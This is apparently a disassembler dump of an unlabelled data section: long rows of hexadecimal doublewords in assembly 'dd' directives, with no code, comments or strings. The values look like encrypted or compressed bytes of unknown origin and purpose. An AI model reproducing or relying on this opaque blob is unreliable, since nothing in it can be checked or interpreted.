		dd 0AE00981Eh, 0A2BB6AE5h, 79C94CC5h, 4059E8FCh, 0DC5DE1E4h
		dd 0A6770FC6h, 0FBE2F44Dh, 42529933h, 0B442EEA4h, 0EECE1903h
		dd 904DD2CBh, 492D7AE5h, 9711CCFCh, 0A23E5809h,	91CC32E9h
		dd 16D65B4Dh, 27E5DA1Ch, 0CAA0087Eh, 0B30277Dh,	50C30C32h
		dd 3CF88EDAh, 8DA2CCFAh, 5994DFA4h, 0A8C4BF86h,	0AB1887F5h
		dd 795AB4Eh, 0C8592B06h, 0A915BEEAh, 8D64627Ch,	0AADFF97Fh
		dd 0F3718501h, 0A1F8E2EAh, 14232705h, 8C0FC8FFh, 63AB247Dh
		dd 0F7DFBA19h, 62628D56h, 0BE465AACh, 675CB907h, 2E08480Eh
		dd 0C175F7F7h, 4509BA9Eh, 0B56DEFF3h, 0EC042ABCh, 0D8111727h
		dd 85669206h, 6D19AA02h, 1A5F8676h, 0FCFFEBDCh,	75655BC0h
		dd 7635518Ch, 0A253D544h, 575D248Ah, 2CE3B609h,	16E0AE51h
		dd 2693EB73h, 0F618EDC1h, 85506BF7h, 8D50201Ch,	0BCD6B873h
		dd 0CE33196Eh, 5B3859CCh, 239C5CC6h, 7491C13Dh,	34BA257Eh
		dd 0CB43527Ch, 0C4AF60C2h, 0B21C2984h, 1CB64C48h, 8EE7C4B7h
		dd 0AEE6C997h, 2D0C0EC2h, 0F4AE112Ah, 4BBF0CE1h, 681FC94Ah
		dd 4AB75F1Dh, 0D4C3A4A1h, 0EC5CBCA0h, 0E22AFEDBh, 0BC72CF8Fh
		dd 0F98E914Fh, 6E56A75Bh, 3D6BA8A1h, 894621CDh,	0EFE5759Ch
		dd 50BA9189h, 6B88DA1Bh, 0B90CEA78h, 1BA50AF7h,	818BF53Ch
		dd 0E15F7F1Bh, 689BB265h, 70A63229h, 0A0903ECEh, 8A582E6Eh
		dd 0A8A18C97h, 702B0507h, 7D18A929h, 34CA4737h,	0A90AA1ABh
		dd 0A6E4B4EEh, 4CEC2FF6h
		dd 95F07C52h, 0FCF4CD46h, 477B8C9Fh, 0FA88B3D3h, 8DF1145h
		dd 0CA535B8Bh, 230D7E6h, 0DDA60AB9h, 9D93E39h, 0FDC531DBh
		dd 0BB0C3431h, 5741E827h, 0A2E39A5Eh, 4775DD32h, 1D9A70BAh
		dd 0BFF3AEAAh, 5D766543h, 8283AEB4h, 62AE9D4Eh,	2954B73h
		dd 0C1E3D7D7h, 3E7BF6C3h, 9323C6F0h, 66124E82h,	0B03E5560h
		dd 2BB79674h, 0C2D38C91h, 3FC638BFh, 54F658D9h,	93E794B4h
		dd 40EB0E26h, 0F8F8ADC4h, 0A04263F9h, 0D0992168h, 7FDE95F3h
		dd 0A32F7C09h, 0C224BAA7h, 449FF1B4h, 44B957FBh, 58157C0Bh
		dd 0A93F5F96h, 0EE74DD4Ah, 73468A3h, 0B5A633ACh, 0A1F85F53h
		dd 0B144DD53h, 501E1AB5h, 5A86C103h, 0BE5756E0h, 2703411Eh
		dd 8A03D7FFh, 0F03F0FDCh, 0E6E72575h, 57AC048Fh, 6E420FC7h
		dd 0DD4FCA01h, 79B1C5BBh, 4FE0A960h, 35F6F239h,	0BEC7D05Ah
		dd 0DAC9B8D3h, 61676897h, 0BC1B0FC3h, 23AACCE7h, 0A32809C6h
		dd 91B1CB02h, 615BBA4Eh, 0ED433057h, 0BAC57FACh, 0CE333EFCh
		dd 0C5437220h, 0E0715144h, 34124BFBh, 8E5C1D7Eh, 4DE12D37h
		dd 5B37F95Fh, 0CCF88BAh, 0D60B4905h, 96CC58EFh,	89520039h
		dd 99C27ABAh, 41F3C590h, 165D8616h, 18FE05EAh, 0BB255735h
		dd 0E1690819h, 0DECB522Eh, 0A593F0Ah, 42899FB8h, 0C21FC719h
		dd 86F9A9ADh, 3E800D67h, 83549B96h, 4D3E8B95h, 1CBB1718h
		dd 47C66992h, 0AA4BCF75h, 968B236Ah, 4DFA78C2h,	75BFF496h
		dd 82CE039Eh, 8B8907C0h, 0D5C9AFh, 800CA800h, 2F0FA350h
		dd 54905732h, 296AC8FEh, 0B77670C4h, 0DD0EAD5Ah, 0DA151ABBh
		dd 54DA12C7h, 0BF435619h, 0CC9469Ah, 71E13CB5h,	0ED3F86B3h
		dd 0E3DA576Fh, 0C25570DEh, 229815B1h, 0A7DACE5Bh, 0D97C0E9Ah
		dd 4737792Fh, 5417DB23h, 0CF0FD776h, 0FA08EA7Ch, 734457Ch
		dd 5CDCB43Fh, 0FCFC9FB4h, 4ACFAD1Ah, 6CC41FCAh,	2F91FCAEh
		dd 3F57CB36h, 49C3D973h, 9251E715h, 0BA1C2AE5h,	9EB0294Ch
		dd 0EA07ACB4h, 51754BFh, 89AA17D0h, 1F3A76FFh, 80C4FA2Dh
		dd 6430163Fh, 7C470933h, 1794F4CDh, 0DDF0AB09h,	58703FDFh
		dd 0BD044AA5h, 0AB12BE6Dh, 0FB35C77h, 0DC5117BCh, 11797EA7h
		dd 0C90CC557h, 40F28DD2h, 0B45AB7F9h, 8ABA3D53h, 3389FAB0h
		dd 0F8999235h, 79D070E1h, 0A6D41137h, 0D91BBCBFh, 6804A9DEh
		dd 50B53DD8h, 4C41F9D2h, 6CEC4057h, 0E7000207h,	4D7433DEh
		dd 81C26A70h, 0A11BC05Bh, 42D16451h, 4F70195Fh,	51E14DB2h
		dd 0A6ED0ACBh, 0EB95E3DBh, 6122514h, 49580F6Eh,	0B6D7C865h
		dd 0B12541AAh, 333979CCh, 0CFDD3E82h, 0E4C2AA43h, 0D71C8BABh
		dd 98499AA9h, 3C808D3Eh, 78FFD882h, 6B7948DAh, 3316D2CFh
		dd 45437C1Eh, 0AE1EA14Bh, 7217CA7Ch, 0DE0F0CD8h, 2CA1DE70h
		dd 69D5DB11h, 0D178BAD2h, 5E7B5C89h, 11B6442h, 0BA64DB17h
		dd 0BFCA7A18h, 3184FF8h, 9DAA4592h, 0EDCE42Dh, 40556FE2h
		dd 514983E4h, 2AB3686Ah, 5C21EDE9h, 94B512B5h, 3F8A6D95h
		dd 9D2B15C4h, 5B2E254h,	8C220B22h, 567A7CEEh, 0F1036078h
		dd 597272Ah, 0FE06E881h, 8716985Dh, 0B5A64EE4h,	0E04AAA3Ah
		dd 0D22C7981h, 0CB45F016h, 0D5826B19h, 86F84EC6h, 49CA6DE7h
		dd 91CCD76Eh, 0FC05C607h, 0D8CF9258h, 77A2FF1Ah, 6AAD5971h
		dd 75C947EBh, 0B54576A1h, 1BF055B4h, 0A70F522Eh, 0F5E24A54h
		dd 598BC2FBh, 438966E1h, 0AAD13BBEh, 9866B8EDh,	0A8542E31h
		dd 9DB38A20h, 0F3DD6128h, 0CC9903F3h, 7BF17B8Fh, 0D466CCC4h
		dd 96718EFCh, 1EA28D7Dh, 876E7FB1h, 0B4FBF259h,	79BDDDFAh
		dd 4F458381h, 55EBDBBFh, 4D194D8Eh, 181F4124h, 0F57F0CE7h
		dd 0C91D3FA3h, 0FFC53943h, 7B44F92Ch, 116B28F5h, 0D97B75FBh
		dd 0C71ABD19h, 0E8EEC7F4h, 5913A655h, 644FD964h, 0BF813EFEh
		dd 6A91F5EBh, 2FF2E852h, 7DFEEBB4h, 4699D252h, 0D0959409h
		dd 0D1197DB4h, 0DE0F22B0h, 2EBA8108h, 0F3D40D70h, 2A7576B5h
		dd 12ADA8D1h, 3C226DCEh, 5CBA73D5h, 0E02B3508h,	87EA78CAh
		dd 0E3AC4ADFh, 0F9AF7D41h, 57D912C4h, 48017F35h, 197403A1h
		dd 66AA6C3h, 157CCC18h,	98F16AE4h, 139E9569h, 20B3F8ADh
		dd 79B90C46h, 0E565045Eh, 0F769EF7Bh, 0F28BC4ADh, 69745CD5h
		dd 84659530h, 0FB150AEh, 0BC57A532h, 0A0F762B1h, 0D3664A85h
		dd 0E0899397h, 4C892696h, 0B14D987Fh, 822536F8h, 0AB38FE93h
		dd 932C6038h, 598CC985h, 0D4F94D34h, 2F9E23E1h,	0C0565628h
		dd 0ED9F257Eh, 56AB6DEEh, 404A697h, 21379B6Ch, 56E58292h
		dd 27811D79h, 0CF76E7ADh, 8F1A4D2Dh, 34CB27B6h,	0C1F7A951h
		dd 13032D0Fh, 603F95AFh, 0F1F9EAC9h, 16E42A29h,	2D7B68A4h
		dd 6AC9CC97h, 8F0E7D41h, 0B45E2A76h, 0DEEFEC5h,	0DA50A4CEh
		dd 1F3BE2B0h, 3C0FFB55h, 4A7A2664h, 795532DEh, 23E29E74h
		dd 9E3B42A8h, 27332925h, 0F60E1A56h, 130E0764h,	1B471CB4h
		dd 0DB7E6DABh, 0E0E181EAh, 9C1A3CF0h, 0BD6944F2h, 10E2CC0Ch
		dd 0F10F8A22h, 2D6C337Eh, 0DBE4CCD3h, 0A8D152D5h, 2EA421ADh
		dd 437A1BA3h, 0F73B7391h, 5BB43407h, 1303444Bh,	0D34B7EF9h
		dd 0DA9FD1CDh, 27BBA977h, 0FAAAD33Fh, 0A23DE51Fh, 5FAA8FF1h
		dd 62541C7Eh, 1BE8EAAEh, 59BD172Fh, 0B1BC3F1h, 71AE82E9h
		dd 10625BDFh, 2EB1EB69h, 0BED294A2h, 0B9A2F695h, 7FB1EC1Fh
		dd 0BE30B6E0h, 6D68ABE3h, 33FFD4B3h, 4307957Fh,	1362950Bh
		dd 5E7318B9h, 0D45594ACh, 1B8C4A50h, 1D95570Bh,	2F8DC881h
		dd 1F765762h, 429A6CF4h, 5653362Dh, 52357794h, 23FC9FBBh
		dd 0F9EE7686h, 0AAA712F0h, 9BBF2BF0h, 0EFBE4082h, 42F4C6E0h
		dd 0F7C70642h, 8F8E1F58h, 58AB23AEh, 759C43CAh,	5343C096h
		dd 4B90F19Eh, 784827D1h, 0FC15E031h, 32A27665h,	46AB6C4Ch
		dd 38B4E910h, 917E15DCh, 0B9AB9298h, 0E1029471h, 63E8ACC4h
		dd 90B9A57Fh, 2AFC7AFAh, 0CAD96C8Eh, 0AD3562A7h, 0C45B693Ah
		dd 0B8DE9DC9h, 0D801ECF2h, 0A352A99Ah, 2A95DAE8h, 1FEC362Ah
		dd 0ED10A29Dh, 33D9E31Fh, 0FB11F36Ch, 0E234FDAAh, 321C8953h
		dd 0CF5EBA47h, 38AC7672h, 0BE9CD2A5h, 859548E3h, 385507FEh
		dd 0AA16E1F9h, 73687ACBh, 1B54178Bh, 0EB398CF5h, 55A04855h
		dd 9DDC81E5h, 0ED789E83h, 712A453Fh, 70955D47h,	9DFADAA5h
		dd 2B9BE1BDh, 2B108F2h,	5A5EA5B0h, 0F768B3h, 0A4B8C89h
		dd 0A8DACB7Dh, 0C69239A7h, 195D2F7Bh, 8DE88AC8h, 0F8003473h
		dd 0A160AC4Ch, 933099C1h, 0B79D7880h, 27BF5B1h,	0E2298886h
		dd 48A2F05Fh, 11172CE6h, 0DC256E3Fh, 2FD35E6Bh,	7D429FC5h
		dd 559DE934h, 0FD6418A9h, 0A21B3DCBh, 0FB32DBB1h, 0EF7FC691h
		dd 7E1B5813h, 0EDF927A5h, 3F6A9A1Eh, 0D1983139h, 4FF72426h
		dd 0A38C79F7h, 0B218534Ch, 9E7C646Eh, 985EF2E7h, 0E1F67F70h
		dd 0CDDED189h, 92513B5Ah, 631795AAh, 0B705C591h, 0F4D20B5Ah
		dd 0F49887E2h, 0EA88D774h, 57B37367h, 0A451B5B3h, 0FB9F9280h
		dd 88B659F4h, 922B8BADh, 65C0257Fh, 0A4065199h,	3D6FE048h
		dd 61CE5765h, 5B28658Ah, 0AD45D48h, 507BD9ECh, 1534A9CFh
		dd 0AA7BBA95h, 11341246h, 2072843Fh, 997DB635h,	2B58BD18h
		dd 0AF1413BFh, 10AA16AEh, 3BA2E2DBh, 579D4064h,	34BEA045h
		dd 12D1D237h, 0B17A5A0Dh, 0FB38F79Eh, 1C88DB19h, 8735E62Fh
		dd 0AAD04ABFh, 0D7AEEB95h, 621D4192h, 0D59BA379h, 0AB35371Ah
		dd 6525518Ah, 0D6C285CDh, 0EA04DDD7h, 84392620h, 0D634752Eh
		dd 9C0F409Ah, 249B0496h
		dd 642F36EDh, 9105AF7Ah, 90FC4904h, 8824F7Ah, 18598F29h
		dd 74FE446Dh, 94A10C06h, 0E56F8B19h, 76DB3F2Dh,	0CC53B1C2h
		dd 0F5D4EE3Fh, 42A2AC3Ah, 0C2AE71E5h, 73949916h, 0B3CD66F6h
		dd 2A940C50h, 0F9B1289Dh, 34774646h, 217F9BDEh,	0EA6504CCh
		dd 9B3ED9FFh, 0FA80FFD8h, 646D1DCAh, 8318D971h,	7E541788h
		dd 59AE4D47h, 5B248BEFh, 3B9A949Ch, 0B4B37F0Ch,	14B05DDBh
		dd 0AE3EC445h, 48894E0Fh, 116BD9CDh, 0A1E043F0h, 0BE7A3283h
		dd 0F239B873h, 67DA975Ah, 69391809h, 0E3BB54CEh, 0F7F23F8Eh
		dd 6EBD3649h, 0A03962F9h, 6660334Ah, 0C57E3A8Ch, 39824F45h
		dd 6124ADBBh, 62EACF3Eh, 27CC0D6Dh, 979EE657h, 5A6DF978h
		dd 841F36A3h, 0FA3C8F17h, 6E81BC15h, 5EFB7D79h,	1C7E8D48h
		dd 0D17CABD2h, 9A8A8033h, 6846CD7h, 5954D3F4h, 8BF5ACADh
		dd 5F277FCAh, 5FF63D56h, 0E3CE360Bh, 0F9D3E0F8h, 558C5176h
		dd 5B6344E5h, 0BBC45C31h, 0E4A88091h, 3FC8C183h, 25B4AD36h
		dd 0D11FAA39h, 8FC18915h, 2A325897h, 0E18F0BE7h, 0A7B444Bh
		dd 4723CE34h, 607C6781h, 46D1DD67h, 0FE6E7AFDh,	0D80F1FF9h
		dd 4232ACBEh, 8A555D11h, 35CFFB2Fh, 2762CAEDh, 0C2B6638h
		dd 0BD9AEAB7h, 0C5340422h, 1B98E311h, 0C370256Bh, 19257E33h
		dd 0C6FC77C8h, 56769210h, 33D93A32h, 525D8E05h,	40AC6821h
		dd 9F392CABh, 5815B398h, 0ABB1C841h, 3266A2CCh,	5DF32554h
		dd 0C9997CDAh, 85A38764h, 92C41634h, 0F9488F5Bh, 51911DF3h
		dd 0A48EDF1Ah, 4AA65160h, 5354AD7Ch, 68944EA4h,	0B3EFD2CAh
		dd 0A93849AAh, 0C0531D72h, 37CC1CE7h, 0EEA12991h, 0EF707287h
		dd 0D9046FA7h, 816D4944h, 0F80C3ED3h, 5B16C652h, 68BFE6DDh
		dd 1A348CDFh, 3FE69E69h, 71DCDA05h, 0ABEA0727h,	0A4B3A712h
		dd 0EDDF5275h, 0C1E1DE0Fh, 0FDF6AC6Ah, 9125B46Fh, 0B406BE3Ah
		dd 56A938DDh, 84F37DBCh, 0AE750324h, 6AAEE4FDh,	5145FDBEh
		dd 0A4C3ACAFh, 574244D2h, 0FFC20481h, 0A2B8D530h, 13D59258h
		dd 0D3176425h, 486E689Dh, 7AF6F0F8h, 18BEE359h,	8C95E0EDh
		dd 0B96D0AE3h, 0F754FE91h, 0D21FF68Bh, 1A4A3D88h, 7B101CB6h
		dd 6B2485D6h, 0D6517402h, 9975E10Fh, 49838916h,	99C819DAh
		dd 0FF33BF2Eh, 1F46FEC8h, 0F0E032BCh, 342553ADh, 37B601C3h
		dd 3BC2CA07h, 0D9A721E9h, 6E75F05Bh, 66D5349Bh,	1F2D5024h
		dd 1ACF87Eh, 9F45A976h,	4B45FFC8h, 45BAD2F0h, 3BD2F41h
		dd 8996BA7Ah, 0ADB88EDCh, 0B2939B26h, 77485A1Eh, 6CAD4915h
		dd 0D06F1C52h, 0CB491145h, 0FE7EBFDEh, 0F4D2939Ah, 97D91E8Eh
		dd 48C665E9h, 617EA1Ch,	0F552C292h, 17E69F0Eh, 0A74250AEh
		dd 2FF6D58Eh, 0F8199B91h, 0E8C4B6E2h, 4B2FD2FCh, 0DAAC53B7h
		dd 5936C6C9h, 8C7CD347h, 65A395CCh, 8EDE01ACh, 0B89537A8h
		dd 0CBC91EF7h, 0B1A20B5Eh, 0E07378Dh, 1BB1D30Fh, 0DF95D45Fh
		dd 90ADD262h, 0D23B6B6Fh, 9E83D759h, 6FFA1892h,	0FFABDFBAh
		dd 7DE6DF61h, 972B8F2Dh, 0A89DAAE5h, 52BA505Ch,	5B25D4Fh
		dd 7AD4688h, 6D20BE86h,	3D75E1E0h, 0B2EDE291h, 8EF68604h
		dd 9EFBF03Dh, 66A13E3Dh, 45EDF079h, 86F07730h, 0C7E27C55h
		dd 4A7EDECBh, 0A949540Fh, 0B2A38FBAh, 0EE5A3544h, 4F696EB3h
		dd 799EC8BAh, 1D41CAD4h, 2EBF592Dh, 7B2C57AEh, 0B3E445DAh
		dd 7EB1399Ah, 44EBDA5Bh, 0D279EDDFh, 8FBA32E7h,	2F324FE4h
		dd 0C535E052h, 5E2709A4h, 6D1EF954h, 0C8F6A255h, 0D59E247h
		dd 1748C645h, 3371242Dh, 5EAB0AD5h, 72CC1F7Bh, 52A9B306h
		dd 0E07CDABFh, 0C9F5F1C4h, 8CF8D8A9h, 7D4D437Eh, 9CB4B7D8h
		dd 0CC989AF1h, 93805EE8h, 8EF3312Bh, 895C7C05h,	9F4F0C9Fh
		dd 412C75F9h, 9C0D1FCEh, 0C565AEABh, 0EBB60AE9h, 2DCE503Eh
		dd 0ACDD252h, 47338C55h, 417F338Ah, 0FFF43F6Ch,	5EEAC646h
		dd 0C25A19AEh, 351A1F8Bh, 9DCA5DEEh, 45DEADA2h,	54CF9DA3h
		dd 0A2A49BE6h, 278E8E27h, 0F6597211h, 0A8308CFCh, 31938BE3h
		dd 120CD4D0h, 8BB64C9Ch, 0A7AD444Ch, 92F36AD6h,	0DFB614C0h
		dd 961AEFF0h, 0B77F7D03h, 9B45B2E3h, 0B324A7F6h, 0D5D2B557h
		dd 0CC1E8EC3h, 59F8A245h, 0DB1874DDh, 2B9880A0h, 748F7E13h
		dd 0A627F28h, 1525EE3Bh, 0F3220E54h, 0D19D74D1h, 5D0F23C7h
		dd 996ADA26h, 27F69C4Dh, 83736D79h, 45EF694Ch, 77FE2319h
		dd 5536B0FDh, 9DAD8B7Ch, 7EDA27F9h, 7BF7725Eh, 5D538B8Dh
		dd 0FB922FA5h, 87F9FB5h, 0FDF9CD69h, 0C7710E6Bh, 9E67AB8Eh
		dd 0A58D73A3h, 0CE166ADDh, 795F33C5h, 2515BE5Ch, 0E97910DCh
		dd 10219EAAh, 0C4EEE187h, 32975595h, 33C3C531h,	1A4BB08Bh
		dd 8B9B7B87h, 12F2224Ch, 509AEBFDh, 5504A6F5h, 4ED94038h
		dd 0F7112D12h, 4678E966h, 0F8B918ACh, 0F9303E58h, 0FC9E6A1Dh
		dd 6A6E2EEAh, 1A3124CFh, 0F063A580h, 0E3F41CC0h, 0C031DA19h
		dd 0D8A37ACBh, 34CAC3DDh, 0B4431105h, 7BCBC39Dh, 4DA6A1BCh
		dd 0AC3FE22Ah, 0B2333598h, 6A9F07B2h, 0FC9ED8D8h, 895BDF87h
		dd 0CE325276h, 0F567FBABh, 0AA424FD4h, 74A67B2h, 4D0455FBh
		dd 816685A3h, 87E0DED8h, 0F0DC574Bh, 0B73A4F2h,	4CB4DC3Ah
		dd 362CED5Ah, 7E25D680h, 0EE947EB1h, 75E49D58h,	598636CFh
		dd 0D7385AF9h, 52A18AD2h, 0F034756Ah, 74DCFF1Dh, 1A5895B2h
		dd 0ADD267BCh, 0FCD3CAB3h, 3CF9383Ah, 0C8AD530Ch, 0A3D7FFAFh
		dd 0CC7A2F0Ah, 62057DE3h, 4A2295FDh, 0B1E3F01Eh, 0DAE98B88h
		dd 38C74EC3h, 372F4266h, 0B6CEDE3Dh, 942127D3h,	0C3836B7Bh
		dd 422E6867h, 0B7ECE8F9h, 1212910Ah, 0C860CF86h, 0B68FB25Bh
		dd 458DDB75h, 3945732Fh, 0D54D9CAAh, 311381E1h,	77190A76h
		dd 0AAE4B105h, 86A4D9CDh, 0D2EFB396h, 0DF8C9688h, 0D6866E69h
		dd 0AC7E36B0h, 0E141744Dh, 0AD44B5C1h, 192FF03Ch, 6F6CDF2Dh
		dd 8C5FF2E0h, 57D1CAB7h, 0F732F0EBh, 1ABA2B44h,	7DE717F0h
		dd 0FDB4B409h, 0C09FD60Bh, 0BA716926h, 0BF838AD7h, 6A5324F5h
		dd 8396DCCAh, 4EE99722h, 0BEEAC52Bh, 61CEA731h,	0F7B8EA95h
		dd 7AD5DC68h, 0D7C3E58Fh, 26E4973Bh, 0F76BCA78h, 0ED52FE8Ah
		dd 0A8A526F0h, 87FC240Dh, 30E51A55h, 0D269F079h, 0A1665F3Eh
		dd 0D3091D5Dh, 8301E644h, 29F87B67h, 5F3FA4A1h,	0C915D0CCh
		dd 8E6103DFh, 0B193A733h, 0D9D9A91Fh, 1492A7BAh, 0A770D8Eh
		dd 0B1139802h, 474CD31Bh, 4897F658h, 0FD6814ACh, 4FB38654h
		dd 9345D8B5h, 1B53FB7Ch, 0C2C68499h, 31A09263h,	162AC161h
		dd 792F3879h, 7F3A568Ch, 32D5BAE6h, 65380DA6h, 0D34E1272h
		dd 2B2B3596h, 7525E07Eh, 71F4677Eh, 139786AAh, 50CB7F86h
		dd 6D67CB97h, 60F5B086h, 9298F4E0h, 0A28777AAh,	82B1D325h
		dd 0AEE3D5E8h, 0ECEACE75h, 53E20387h, 4B649556h, 0CCFC574Ah
		dd 5A425413h, 0ECEA993h, 0D17FD0A9h, 0D15EAC81h, 0ADD6F32Fh
		dd 90CAAC20h, 332F2001h, 1CDC8DA2h, 0F509DE71h,	1AAF2DBFh
		dd 818C879Dh, 0CCBF9239h, 97FCF890h, 49B1E12Ch,	8ED6DAAFh
		dd 0E6F94315h, 2A02D8BFh, 9AD1ADFFh, 698F5686h,	81F9CA57h
		dd 0BFAF0EA9h, 7469D120h, 0CD2612EEh, 0DFE93796h, 9CEA2870h
		dd 0A3A6D53Bh, 65998E2Ch, 0A1B44D46h, 31256933h, 79FB3BD6h
		dd 8796FEE0h, 0F1CB6EACh, 7675FC5h, 56EFD74Fh, 9AE3AF0Dh
		dd 69EC973Fh, 0C1046856h, 0E0FD449Dh, 0B3C9044h, 77BB1578h
		dd 0E1AA15E9h, 0DC787E5Fh, 0AD6F9EC8h, 3DC8CB46h, 0FAD1DB7h
		dd 23AB7E26h, 9D535705h
		dd 0E4F499E8h, 21FB86B5h, 19401454h, 91C7A04h, 0EF156230h
		dd 0C5EB7CEFh, 0A5CB7AC4h, 7852EA8Dh, 0AF6DA3E0h, 8EB25E75h
		dd 85D83B58h, 93E46EE9h, 0D1A7A673h, 877AD2Eh, 715F5CCFh
		dd 7CC0259Bh, 0EBD60151h, 6FC1A646h, 3BF4E81Ah,	0DB38E24Bh
		dd 2C0DC5CCh, 0B62D956Eh, 0CBEB1FF1h, 6AEF0FD6h, 5B54485Eh
		dd 1B03BF1Dh, 0D0B76E8Ch, 973DE5F3h, 8E0F6B2Eh,	1B065442h
		dd 87DCCD98h, 0D3E25B12h, 0EFDBE59Bh, 0C2D5F444h, 0C04DC045h
		dd 0B09A577Bh, 49A933E3h, 0AFE61BEBh, 71F30BAEh, 4E5D38A6h
		dd 0E8507A69h, 0F511CB82h, 7F410E7h, 2795B0D7h,	3CC27DD2h
		dd 425D7DAEh, 81366D86h, 0F2EC46Fh, 727599FEh, 0B0C016DDh
		dd 0CAEAF06Fh, 0CE019B4Ch, 0AEA4671Ch, 0B8FB93B4h, 0B47EAC4h
		dd 0C9EB033Fh, 981EE6E8h, 0ED1F5F23h, 0A99DEF4Bh, 5AD45470h
		dd 72B411E6h, 75E6E01Dh, 2EA9EA9Dh, 74FBB794h, 24C338Dh
		dd 2D8D9CF7h, 0C96ABB76h, 0B95241D5h, 3042ED40h, 0D8EBB470h
		dd 16B1D5FEh, 0A3B78423h, 1BB61684h, 0FAAA4A8h,	0C0FDFBE5h
		dd 38CC54Ch, 0F3F972B6h, 7F13F51Dh, 0AA3DAD0Ch,	0E3F32A85h
		dd 0D91AB690h, 4EA696E3h, 0C171646Bh, 607A013Bh, 0F6294189h
		dd 0F6CA398Ah, 3A75C2F6h, 37C95A78h, 0F27A8317h, 0A0F2BD37h
		dd 49DD2224h, 0A3689F94h, 0F4D02C4Ah, 0A3E1B14Dh, 0E2F258Dh
		dd 30A7BD31h, 575DF92Fh, 1CA2DFCh, 0E1AFC2EBh, 0B3BA5C7Ah
		dd 1E62BCF1h, 0DAC71DEEh, 0B213B1BBh, 3771C681h, 638D6F84h
		dd 0DF57EF81h, 0F55A3CA8h, 6DEEABCBh, 0EE88583Ch, 0C213E2D1h
		dd 0FF696DFFh, 0AAAF9C56h, 0E37F7EFEh, 0A82D364h, 0BD5C645Dh
		dd 57C9DC3h, 7BA2EA35h,	0E57B485h, 707EEF8Dh, 3287CDB4h
		dd 8C44FAAAh, 0FD1C99ECh, 0C5B3665h, 9E0CB2F7h,	0A188FD5Ah
		dd 0A06E35A3h, 0B61372A9h, 0EB3CE1B8h, 8F566BF7h, 36E0A212h
		dd 0F572E8D8h, 0CE7ABB8Eh, 0B45E90DFh, 0DE58D53h, 0CBE4E71Fh
		dd 0C1C76F03h, 0CD311DECh, 2F120BA4h, 0D74D59C6h, 742E2CFEh
		dd 0AD684D76h, 0E2D4B68Ah, 0DABDC15Dh, 3C229C0Fh, 0B14975CFh
		dd 2C455DACh, 72A12BAFh, 0FFC46998h, 0F1B24722h, 5020EB2Bh
		dd 87F199B5h, 0F3B2B096h, 8AB8ECE5h, 24C58160h,	0DF4A1991h
		dd 0A71520C4h, 0A24D944Bh, 8AE5BBC8h, 945943B8h, 5C579A38h
		dd 310FA5EAh, 7C2CEE91h, 52C9E229h, 0EB4578D7h,	0E48BB7F1h
		dd 0C6EA9F4Fh, 0E8B3AA40h, 6CB0E55Ah, 0D7B5245h, 378DBE24h
		dd 1709713Ch, 0A527A4ABh, 0F0715290h, 7C4F4FFDh, 890F555Eh
		dd 3D46F696h, 0A3B4C54Ch, 0B2001B08h, 85C4D55Fh, 808F89B7h
		dd 928798E3h, 0BBBBFC53h, 49B6A08Ch, 7E0E3B62h,	7B2B9998h
		dd 8CA665FAh, 56CB6276h, 0BAD7D9Ch, 0A601CB2Bh,	0E39667CAh
		dd 778B531Dh, 0A551C4C1h, 0EDDAF950h, 12CEDBFFh, 6588C5Dh
		dd 0B34A1C0h, 316D7E02h, 751379BBh, 0C4C23166h,	8965816Ch
		dd 3256A76Ah, 2F1AE5FAh, 19D65C28h, 0E6560CEBh,	44A8916Ch
		dd 530E3527h, 0E96778E0h, 6708BF25h, 24D2FABBh,	19AFFCA2h
		dd 4EB6C4CDh, 198858EEh, 8D3CA9BAh, 0BD3043A8h,	50F057EBh
		dd 8EB29DECh, 5EF2D07Dh, 8A48DCF5h, 0B10D23F1h,	1FFBE878h
		dd 0E079E027h, 0C459F7EBh, 0CE2B1EAEh, 0C5C47D2h, 0CF454309h
		dd 3E2962Dh, 0C042A1A3h, 0EAD984E7h, 0DF8336ADh, 4855CD37h
		dd 0E45642DFh, 8C8663D4h, 0EC5AEAF6h, 7CB8DEEFh, 0AB67713Dh
		dd 8BA4FBF3h, 0F75DE5B6h, 39A352C9h, 0FCCD2FC4h, 0E9AFC1C1h
		dd 0ED2C8511h, 0A2B41322h, 0EE461C8Bh, 0D94A5172h, 5CE4C942h
		dd 5F8C316Ah, 6B5DCF94h, 34E16F1Dh, 8778CD29h, 0E60AD1EFh
		dd 7D2730CEh, 0FF03720Fh, 8761FF72h, 40A4DA4Ah,	87A389D3h
		dd 0C7A80408h, 0EBD25D8Eh, 61B85351h, 2B849CA3h, 0B26E8569h
		dd 7F15C52Ch, 68E7373Ch, 5E156EA3h, 3D0FF77Ah, 0BD142152h
		dd 482FC16Bh, 40FD6271h, 56951D46h, 935C716Dh, 6B724582h
		dd 0CCFA9A52h, 8A98B94Ch, 286A1508h, 0C5A70A45h, 0FD0AA637h
		dd 3C4FAAD7h, 6FB1932Ch, 8DEE2C2h, 0B82D0185h, 19C5BFCCh
		dd 4E3B8CDCh, 476EDA94h, 517EA441h, 725DA311h, 0DA36D645h
		dd 0CAD24585h, 0A06A9785h, 0A9C1EBD1h, 4C70C3CDh, 5F1E7478h
		dd 0F2DC1215h, 9EFA3AFBh, 8B56E739h, 6A8A6E07h,	2882C347h
		dd 0B029A6D6h, 0EDD6077Fh, 9DEA9E61h, 1D0BA8F1h, 0F1EF39A1h
		dd 0C1794139h, 97C6DB85h, 0EEF6F965h, 5A9132F5h, 0BC2DD2DCh
		dd 91D56D6Bh, 53160DB7h, 0BA879F5Bh, 1C074B35h,	9D1AE237h
		dd 0D6C34E51h, 0FC3CDB1Dh, 38C4C43Eh, 690B5766h, 6644A41h
		dd 565D5089h, 6268288Dh, 0D667CC70h, 0D19EF8B3h, 8DC16B68h
		dd 1C438C4Fh, 9E04E4C6h, 0B9922D69h, 0FDD225D4h, 7A29994Eh
		dd 6E9F9500h, 449FA30Eh, 0AAEC1592h, 455DE2FEh,	0ED1BFFB1h
		dd 59572A66h, 166675B8h, 0E1FCF3Dh, 7A856BC4h, 6A5D869Dh
		dd 8E9C9EB5h, 4AAE437Fh, 44E995Ah, 0CE2DF064h, 0C2A701F3h
		dd 0B8ABEEBDh, 0F455872Bh, 759B1EE5h, 509D98CCh, 0F3E315C2h
		dd 0E4ECAB5Eh, 2DBA697Ah, 0DB847093h, 0AAA1507h, 0CE5A6541h
		dd 0DC61681Ch, 0AC2D61E3h, 20C0BF31h, 904B42D1h, 5216609Dh
		dd 89E7E14Eh, 4C99AA56h, 35BA6EEBh, 0E9E3BB2Fh,	67F6AFF7h
		dd 0C4BE70B5h, 0D0AF3C56h, 6F6E5EEDh, 7DD3B32Ah, 0CA8EE860h
